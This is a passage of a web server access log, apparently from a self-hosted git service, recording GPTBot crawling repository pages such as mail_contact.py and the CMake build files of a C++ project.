+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:14:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 19281] [Gzip 8.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:14:50:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:14:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10877] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" +[17/Feb/2026:14:51:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10192] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" +[17/Feb/2026:14:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10418] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:51:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:51:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10165] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" +[17/Feb/2026:14:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11407] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" +[17/Feb/2026:14:51:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" +[17/Feb/2026:14:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11118] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" +[17/Feb/2026:14:51:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/mail_contact.py" +[17/Feb/2026:14:51:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/mail_contact.py" +[17/Feb/2026:14:51:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/mail_contact.py" +[17/Feb/2026:14:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/mail_contact.py" +[17/Feb/2026:14:51:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11146] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14161] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11878] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14728] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11304] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode" +[17/Feb/2026:14:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:51:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 21338] [Gzip 6.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:14:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13352] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:14:51:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10465] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/main.cpp" +[17/Feb/2026:14:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:14:51:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 6458] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:51:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11064] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:51:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:51:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10229] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10661] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:51:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10241] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:51:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31147] [Gzip 11.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:51:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9988] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:14:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10004] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:14:51:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:51:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:14:51:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:14:51:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11672] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject" +[17/Feb/2026:14:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15618] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build" +[17/Feb/2026:14:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build" +[17/Feb/2026:14:51:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:14:51:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" [Client 74.7.227.38] [Length 10383] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" +[17/Feb/2026:14:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 1597] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:14:51:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 2917] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:51:26 +0000] - 200 200 - 